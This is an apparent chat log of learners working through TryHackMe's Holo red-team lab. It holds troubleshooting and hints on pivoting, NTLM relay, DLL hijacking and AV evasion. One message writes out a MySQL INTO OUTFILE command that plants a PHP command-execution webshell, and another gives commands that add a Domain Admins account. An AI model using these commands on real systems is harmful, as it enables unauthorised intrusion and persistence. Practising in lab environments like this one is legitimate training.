still getting conn refused. Just to double check, I'm shuttled into L-SRV01, have ntlmrelayx running, which seems good, anything else I'm missing? EDIT: forgot to say about metasploit portfwd, it's enabled

u not alone lmao

remember to start ntlmrelayx before port forwarding
remember to add the smb2support flag in ntlmrelayx

if you port forwarded before enabling ntlmrelayx, reboot PC-FILESRV01

ah okk tyty

is the psexec error that was being reffered to [-] Authenticated as Guest. Aborting [*] Opening SVCManager on 10.200.186.30..... [-] Error performing the uninstallation, cleaning up?

lol yeah nvm

use smbexec

yeah I got it now lol, tyty

shuttle keeps dying b4 i get flag

Chisel supremacy

LETS GOOOOO

@wind bobcat can we use a random address?

in the report

?

wdym

the address of the company which did the test

uh

not really needed?

oh okok

If you're still stuck on task 18, maybe it's because you didn't ||use DashboardDB||

Does the webserver on S-SRV01 really check the type of files being uploaded?

yes

it will throw a weird error in other case as far as i remember from memory

Well I just reset my network to verify this and I didn't face any trouble uploading the php file

weird

I'll wait for the creators to verify this

Can someone let me know what im doing wrong with scanning the network. I am on 176 subnet or am i crazy? Trying the nmap scan suggested in the walkthrough and this: nmap -n -sn -vv 10.200.176.0/24 -oG - | grep -i 'up' which worked a few weeks ago when i started this, returns everything down. Just coming back and reset progress. I triple checked my vpn connection and I am connected to the hololive network. thank you!

Is the network started?

ya. was reset 28min ago too.

If you reset progress did you regen your config file?

i have not. ill do that

that was the issue. ty

Hey @lone spruce, sorry for the bother man, but can you confirm if there's any filtering for images on S-SRV01?

JavaScript, yo

gotta drop it

Well I reset the network and uploaded a php file and it worked. No filtering whatsoever.

So am a tad bit confused about the report part.

u wut

I didn't need any sorta filtering

wacky

To bypass the "image only" restriction.

https://tenor.com/view/calculating-puzzled-math-confused-confused-look-gif-14677181

Actually, now that I think about it, I never actually faced an issue with that.

Can this be a Brave thing?

probably not?

if you intercept with burp what does it respond with?

Yeah, doesn't make sense.

Wait lemme try

But so far, I haven't have any issue except for the usual blocking when you upload a simple and obvious payload

maybe u doing some mime type bypasses unknowingly? lol

how can i restart the vulnerable app to run the malicious dll file ?

you dont

should i just wait ?

yes

hello is it normal that the web app 10.200.162.31 let me upload any files without even bypass the filter?

i've been waiting for almost 30 minutes and nothing happen, should i try something else and wait another 30 minutes ?!

well the thing that is happening is the following when you press to upload an image you get redirected to the file upload url but the filter is not present in this page so we can freely upload anything

without even try to bypass it lol

what if you wanted to go to DC but smbexec said STATUS_SHARING_VIOLATION

I got the flag, but can't hold a stable shell long enough for other stuff

i would validate that you're doing everything correctly

i would recommend adding a new user account with net user /add username password
net group "Domain Admins" /add username

That's where my stuff crashes

interesting, you could try a reverse shell

should i do some AV Evasion here too ?

if you search for hta in metasploit, it's quick and easy

Awesome ty, would that still work even if I don't have access anymore? everytime I try to exec now I get no chance for code exec

ah wait, I can just relay secretsdump lmao
ty all for da help

@wind bobcat hey, so it is written that we dont have to use printnightmare or any kind of loud exploits but ntlm one is the loudest exploit lol ? Do we have to write that we had a permission to use it?

can someone tell me what .dll vulnerable

10.200.189.33 is down

it happens a lot and i have to start all over from the beginning

i can't get the dll to run

i keep getting Meterpreter session 1 closed. Reason: Died

how are you creating it?

mysql -h 192.168.100.1 -u "admin" -p -e "use DashboardDB; select '<?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE '/var/www/html/sl.php';" curl http://192.168.100.1:8080/sl.php?cmd=id and don't working

already test all ips up and ports and not working

already try

but i don't understand how to encode it

The lab is completely buggy

I have a feeling we’re maxing out our resource limits on the box

😭

nah 👀

maybe

lol

i generated a dll payload with msfvenom and put it in ||the desktop and name it to kavremoverENU.dll||, am i do the right thing? Because there is no connection received

antivirus

AV evasion ?

try resetting the network once

it happened with me once

worked fine after that everytime

did you have to do AV evasion?

For the dll, nopes

ok i'll try that, thanks

was it intended that we have to do av bypass with dll too?

never felt a need for it

?

what kind of dll did you use?

its intended to have AV enabled. Someone might have disabled it

it is disabled for me and the payload not working

one generated by metasploit.

after reset too, it was working

real time protection was disabled

ugh, Ill have to add that to my list to fix

lol it would become difficult

😅

tho yea av disabled seemed weird during the first try too

thats a problem in how you generating it then.

As always we suggest testing your payload first before attempting to bring it into the environment

i do and it's working in my environment

kekw I think we straight up just crashed defender

how long did you wait?

more than 30 minutes

If its still not working then I suggest a reset. The scheduled task can be wacky

how do you reset the network?

The reset button

i can't get my Reverse Shell to connet back to me for task 43

also does the dll need to be 32bit or 64bit

just download the only already present

there

??

well i have try both and it did not connet back, not at the same time

download from the system

Are you talking about the attacker or victim system?

victim

cry do you suggest to test the amsi bypass etc to our vm first ?

I mean u dont go into war without preparing for it lol

exactly!!! wise words

@twin karma is it working for you, the dll hijack? if not pm me for help

@rugged leaf it needs to be 32bit, 64bit will not work

wow im so lost in the amsi part

just the follow task 40 in the wreath room

whoever made the S-SRV01 clap clap clap well done. I can't get the foothold at this point. I can||upload files, but can't get anything to execute or load properly||

network reset 10.200.186.0/24 plz

a MSF Venom exe shell work fine on PC-FILESRV01 but i can't get dll one working

am i placing it in the folder becasue i can get the .exe one working and before you ask i did not use the same ports for .exe and .dll payload

@zenith delta just the follow task 40 in the wreath network room that what i did, PHP Payload Obfuscation

Task 35: Two of the same sentence:

thank you very much

@wind bobcat I stg. Look at this

finally, i complete the hololive network it's an amazing room and have a lot of new ideas, But it has many disadvantages it's so slow and has a lot of errors, almost in every machine you compromised you will face an error and the problem that you should get 3 votes to reset the network that is so annoying for me because of errors and the laggy machines

Hi there, if you check the pinned messages there's a feedback form -- if you could please fill that out and detail some of the issues you faced, that would help us fix them and help improve future networks

I've earned the HoloLive Badge on TryHackMe for Hacking HoloLive by exploiting and pivoting through a network https://tryhackme.com/fatkungfu/badges/hololive

🥳

👀 I was pretty much fine with it. Dk why u got so many problems. And resets amount is fair thinking that there are 15 persons per network. 👀 and u get a reset per hour. Often i got into situations which i thought was error but it was just me doing things wrong

try giving it another shot.

its easy the second time :)

Hi! Can someone kindly post a screenshot of the task regarding the submission and deadline of the red team assessment report ? I had terminated my VIP subscription last week

I can DM you it?

Yes, greatly appreciated!

Hi anyone, can you give me some hint? I started a holo few minute ago. I connected to the holo network and the access page on THM also shown it connected. i tried to use nmap as guilde and also ping the ip. but i can not ping to the live host of holo network. Is there any problem.

Which IP are you trying to ping / nmap?

10.200.69.33 or 10.200.69.0/24 this is what i am testing.

The .69 subnet is broken, it was a testing subnet iirc (should be something about it in pins). Try leaving and rejoining

so that you get on another subnet

and then regenerate your openvpn file

Oh.

thanks you.

let me try it.

#holo-network message

np :)

Hi Bro, when i left and rejoin the subnet 69 still there. it doesn't provide a new subnet as you said.

It should've worked, I think someone else faced the same issue

Try rejoining etc again until you get a new subnet, not sure tho

@wind bobcat ??

wow. this is weird thing. when i left. at view page i got subnet 68

but when i click to join. it changes to subnet 69. 😢

weird

10 times leave and join without working.

😢 upset

@outer junco // @clear zephyr

Do you mean the subnet changes when you join the room?

Hey, I cannot download the vpn file for Holo
It always gives me a 404

could you try these steps:
#site-support message

will do, thanks!

Gave +1 Rep to @wind bobcat

if you still have this issue, try to leave the room and wait for a while. did the trick for me (waited for roughly two hours)

In task 39, it says: ```txt
Various teams may approach situational awareness, but we...

But isn't it supposed to be:
```txt
Various teams may approach situational awareness differently, but we...

@outer junco @clear zephyr @frigid nacelle do you all have any insight into what is happening with this content? We are getting a ton of weird bugs going on in the task contents and it’s not us

Let me check.

Any examples?

Someone tried to hack tryhackme jkjk

@frigid nacelle

There are a bunch of others in this channel just like that

Also tasks moving around

Looking into it.

@wind bobcat @thorn willow i have just rejoined but it's the same. nothing change. that kinds of weird.

before click button join room. i saw on the picture that it's subnet 68. but when i clicks to join then i got sub 69. @@

@worn nova are you sure its 68 before you join? i thought so aswell, but i think its just the white line making it hard to see 😄
and did you wait before rejoining the room after leaving? worked for me after ~ two hours, twice actually (had some weird issue with subnet 189 aswell)
i also regenerated the openvpn config file and relogged, but im not sure if this is necessary tho

sorry for not being more helpful, was trial and error for me aswell

That solution has nothing to do with waiting and more so what we did on the backend

TLDR 1/2 people who can fix this are out rn

@clear zephyr can you add more networks? Seems we’re out again

and or bump the max number of people allowed in a subnet?

Im pretty sure weve already been maxing resources. Id rather not push it more

doubt that there's more than 1 person a subnet on at the time

If it's any help I haven't seen any activity (except mine) on .107, noone else than me have voted for a reset and there haven't been any files there except the ones that I put there

on the machines on the network ^

it has seemed to me that .33 had been struuuuuggling

cc @clear zephyr

So no one should be landing on the .68 subnet

Please let me know if it's happens

Any other ones should be working ok

Unless anyone is facing issues?

guys can u please vote for reset? the machine is stuck

Resets are not universal between subnets. Please specify the subnet you need reset

dll hijacking is kicking my butt. The method I know how to do it doesn't work because I can't get procmon to start

just read the task. its quite clear on how to

:)

Would like to know how to do recon without any gui tools but whatever spend 7 days trying to do that and got nowhere

@livid shoal just a butch of hey that's never installed by default haha

well well, just download the file from the server. to do that there can be multiple ways but one i like is just finding some lightweight file server exe binary on google they are many. Download it on the victim machine with invoke-webrequest and then start the server and then download the same file running there to your attacker machine

then run that

file in your own windows vm

with procmon installed

:)

and have it be blocked need to run with admin perms

kek

u dont run procmon on victim u run it on your own machine

oh

:)

is gui tools like procmon the only way

it's really easy to find what process/programs are missing dlls but hard to find where the dll is

👀 its really easy if u know how just think

its right in front of you

Well thanks for the help. Will still try to find a way to do it without procmon is like 10% of the time

Hi i have problems with the vpn

i cannot download it

it says that has been lost in the matrix

No it’s not. It literally tells you

It’s not hiding anything

I need a reset please, subnet 192.168.69. the machine is stuck again

my subnet is 10.50.70

That's your VPN IP subnet, what's the subnet for the machines?

#site-support pinned

You’re on the 69 subnet. You need to leave and rejoin. That subnet is broken

hey, i cannot download the config for holo, 404

me too

i have the old one but the network subnet changed

leave and rejoin from room? or disconnect and reconnect?

leave and rejoing

and regenerate your openvpn file

ok thanks

well I'm to dumb or trying way to hard to figure it out

@lone spruce can I dm you DM you?

Sure

There’s really no reason to though

i have issue working with mimikatz on S-SRV01 after uploding it on the target by ussing Covenant (as mentionned on the task) he trigger AV and i'm not able to use it, i tried to disable Win defender but was not succesfull and seems that command's like "MpPreference" is disable too. So do i really need to find a way to disable WinDef? or should i found an Exclusife folder to be able to use Mimikatz?

My recommendation would be to clean it

cleaning Mimikatz in the same way as the Grunt?

hmmm ok i see i'll try to find a way to clean it thanks

Same concepts apply to everything

cry i am on the way to pass the hash of user in srv01 in the rest of the network

yet the hash is not working in 10.200.162.35

It probably is

Evil winrm probably isn’t

Use an rdp session instead

how do I give rep again?

cry is it normal to not get in via rdp in file server with the creds i found via mimikatz?

nevermind it worked after 10 times lol

thats better lol

Well can i got in via rdp but you need to change the domain to holo.live and then use the creds

The funny thing is why when i scan the host .35 .32 they dont show any open ports even when i pivot into the network via sshuttle

Reset for 10.200.186.0/24 Please.

can I ask someone who has done Task 28 a question to see if im crazy?

@vernal veldt sure